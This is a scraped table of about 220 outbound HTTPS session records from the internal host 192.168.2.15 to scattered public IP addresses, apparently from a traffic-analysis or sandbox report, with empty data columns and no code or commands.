                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11863192.168.2.1550662196.7.27.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11864192.168.2.1559288163.160.62.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11865192.168.2.1557502107.145.172.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11866192.168.2.1549772137.44.141.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11867192.168.2.155519459.64.167.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11868192.168.2.1541548186.253.14.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11869192.168.2.155218236.230.219.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11870192.168.2.154437894.158.165.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11871192.168.2.1545210166.37.26.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11872192.168.2.154692614.80.41.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11873192.168.2.1557026123.199.76.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11874192.168.2.153446874.97.45.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11875192.168.2.1551706137.10.104.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11876192.168.2.1545316196.169.223.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11877192.168.2.1541988135.130.36.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11878192.168.2.1537398160.15.107.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11879192.168.2.154465466.141.181.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11880192.168.2.1541684203.164.62.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11881192.168.2.153420089.49.6.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11882192.168.2.15571185.16.42.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11883192.168.2.1541264164.91.111.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11884192.168.2.1545812106.226.105.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11885192.168.2.154791864.89.170.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11886192.168.2.155366249.156.45.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11887192.168.2.1539500122.232.230.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11888192.168.2.153491684.24.92.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11889192.168.2.15596208.75.218.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11890192.168.2.1550748155.29.87.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11891192.168.2.155628057.149.105.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11892192.168.2.154943053.18.70.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11893192.168.2.153897836.50.187.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11894192.168.2.15328864.225.220.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11895192.168.2.1547516119.82.61.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11896192.168.2.155941289.50.95.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11897192.168.2.1541254126.252.148.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11898192.168.2.1559136126.86.44.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11899192.168.2.1540070134.98.16.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11900192.168.2.1536018136.232.188.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11901192.168.2.1533094181.193.203.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11902192.168.2.153318677.169.80.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11903192.168.2.1535278197.81.66.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11904192.168.2.1536372180.146.102.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11905192.168.2.1550826163.47.169.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11906192.168.2.1547002103.56.26.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11907192.168.2.154074424.215.63.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11908192.168.2.1539874155.224.11.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11909192.168.2.1543838154.144.249.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11910192.168.2.154897252.93.225.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11911192.168.2.15481282.157.207.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11912192.168.2.155996452.13.225.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11913192.168.2.155787039.220.70.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11914192.168.2.1558850124.101.220.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11915192.168.2.1541712141.86.166.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11916192.168.2.1560802185.162.62.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11917192.168.2.154078888.174.40.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11918192.168.2.1557122180.201.96.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11919192.168.2.1536018206.177.178.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11920192.168.2.155178834.156.163.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11921192.168.2.155195037.222.166.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11922192.168.2.154710284.51.253.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11923192.168.2.1559966158.69.14.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11924192.168.2.1549140171.224.54.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11925192.168.2.153530824.128.85.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11926192.168.2.1543780191.244.97.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11927192.168.2.1554912220.155.204.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11928192.168.2.1542046114.41.112.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11929192.168.2.155372246.142.60.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11930192.168.2.1547720130.26.242.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11931192.168.2.154848887.156.200.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11932192.168.2.1533916119.83.87.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11933192.168.2.15417869.162.94.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11934192.168.2.153653447.129.117.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11935192.168.2.154279096.193.67.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11936192.168.2.1557196120.223.43.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11937192.168.2.1559510208.149.87.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11938192.168.2.154528870.197.225.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11939192.168.2.155355640.0.219.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11940192.168.2.1552170129.210.71.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11941192.168.2.156097464.251.46.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11942192.168.2.1557436113.119.154.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11943192.168.2.154747697.59.243.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11944192.168.2.1541702152.65.247.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11945192.168.2.155928666.212.251.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11946192.168.2.1542902213.183.102.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11947192.168.2.154556051.78.75.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11948192.168.2.154325420.12.233.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11949192.168.2.1557578109.254.81.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11950192.168.2.1547270145.1.226.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11951192.168.2.155138070.131.114.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11952192.168.2.1534770144.79.200.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11953192.168.2.154991669.84.37.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11954192.168.2.1534596152.227.86.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11955192.168.2.1560814112.197.3.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11956192.168.2.1544216210.85.40.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11957192.168.2.1540466156.158.249.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11958192.168.2.1540048126.81.116.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11959192.168.2.153942014.60.28.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11960192.168.2.153992486.183.39.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11961192.168.2.1540194131.161.72.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11962192.168.2.1548524179.172.58.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11963192.168.2.154977860.60.44.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11964192.168.2.155381482.15.70.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11965192.168.2.155207689.208.142.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11966192.168.2.1540272167.130.232.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11967192.168.2.1544144105.110.77.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11968192.168.2.155626495.25.25.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11969192.168.2.1539128115.197.208.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11970192.168.2.1543906174.36.248.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11971192.168.2.1542876199.241.80.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11972192.168.2.1546718120.193.142.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11973192.168.2.1532860157.249.118.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11974192.168.2.1549210132.53.230.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11975192.168.2.1555606198.167.170.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11976192.168.2.1556172135.202.166.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11977192.168.2.155405297.184.24.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11978192.168.2.1550580201.37.231.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11979192.168.2.1558040131.57.29.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11980192.168.2.1542742121.93.196.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11981192.168.2.1554612169.197.34.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11982192.168.2.154806666.73.9.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11983192.168.2.155299020.18.18.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11984192.168.2.1556712109.129.59.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11985192.168.2.1554164176.142.122.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11986192.168.2.1532882201.232.15.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11987192.168.2.1558480142.227.229.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11988192.168.2.1555468208.183.32.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11989192.168.2.1559876121.69.104.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11990192.168.2.1541546198.250.150.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11991192.168.2.1544706193.117.26.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11992192.168.2.154302631.213.247.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11993192.168.2.1549804200.113.14.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11994192.168.2.1533290122.236.151.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11995192.168.2.1554940106.81.80.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11996192.168.2.1543396159.154.68.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11997192.168.2.1536512196.141.60.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11998192.168.2.154932476.153.208.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11999192.168.2.155135862.109.155.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12000192.168.2.1556696204.98.98.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12001192.168.2.1538976213.142.181.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12002192.168.2.153617074.68.88.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12003192.168.2.1554484109.230.254.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12004192.168.2.153754647.101.250.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12005192.168.2.1555524173.98.164.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12006192.168.2.1558458105.47.239.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12007192.168.2.1558036196.147.131.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12008192.168.2.1547496172.148.237.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12009192.168.2.1547692141.178.120.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12010192.168.2.153965817.112.216.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12011192.168.2.1535526161.57.183.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12012192.168.2.1539552124.193.243.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12013192.168.2.1557874140.36.165.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12014192.168.2.1537400119.201.6.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12015192.168.2.1551130161.146.117.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12016192.168.2.1550042160.157.68.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12017192.168.2.1543588200.25.109.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12018192.168.2.155884424.20.81.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12019192.168.2.15396702.18.96.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12020192.168.2.155288879.78.148.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12021192.168.2.1553278140.31.199.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12022192.168.2.155380695.223.11.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12023192.168.2.154474469.208.191.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12024192.168.2.1558456193.149.139.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12025192.168.2.154438431.238.26.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12026192.168.2.1547906187.167.62.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12027192.168.2.153601878.210.56.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12028192.168.2.1554382102.136.228.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12029192.168.2.15559024.193.10.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12030192.168.2.1538158201.247.143.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12031192.168.2.1557900222.96.150.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12032192.168.2.154913490.222.82.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12033192.168.2.155757019.130.16.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12034192.168.2.155635648.72.10.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12035192.168.2.1535276159.167.80.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12036192.168.2.1560402121.161.59.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12037192.168.2.1560528156.191.225.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12038192.168.2.1547534118.148.93.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12039192.168.2.1541250106.250.224.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12040192.168.2.1542270162.240.162.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12041192.168.2.155543681.206.37.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12042192.168.2.1559880156.111.172.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12043192.168.2.1536778220.97.184.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12044192.168.2.15400225.129.32.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12045192.168.2.1556800175.47.224.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12046192.168.2.1549376217.162.248.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12047192.168.2.1552002192.245.0.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12048192.168.2.1542404103.147.97.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12049192.168.2.1533870196.78.252.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12050192.168.2.1551594186.1.142.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12051192.168.2.1542574155.80.63.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12052192.168.2.1549950153.234.146.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12053192.168.2.155392048.222.67.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12054192.168.2.154979019.217.182.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12055192.168.2.1557614219.48.44.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12056192.168.2.1551026181.212.135.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12057192.168.2.1553162221.27.100.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12058192.168.2.1544338148.223.190.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12059192.168.2.1535744194.186.188.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12060192.168.2.1544910209.76.15.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12061192.168.2.1534196149.39.210.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12062192.168.2.1539614191.186.208.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12063192.168.2.1555968168.137.92.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12064192.168.2.155933213.65.74.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12065192.168.2.15569589.148.1.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12066192.168.2.1544420178.239.212.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12067192.168.2.1544916221.69.206.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12068192.168.2.1550360141.222.67.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12069192.168.2.1551288176.171.201.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12070192.168.2.155970688.66.106.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12071192.168.2.1558900126.92.170.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12072192.168.2.1551682210.240.76.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12073192.168.2.1549612202.111.146.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12074192.168.2.1543080118.170.153.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12075192.168.2.1553278187.66.24.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12076192.168.2.155503824.218.12.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12077192.168.2.1534996119.238.68.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12078192.168.2.1541912179.61.199.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12079192.168.2.1556450133.43.136.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12080192.168.2.1549280173.52.82.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12081192.168.2.1535194173.154.161.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12082192.168.2.1549968223.91.171.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12083192.168.2.1548372204.60.213.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
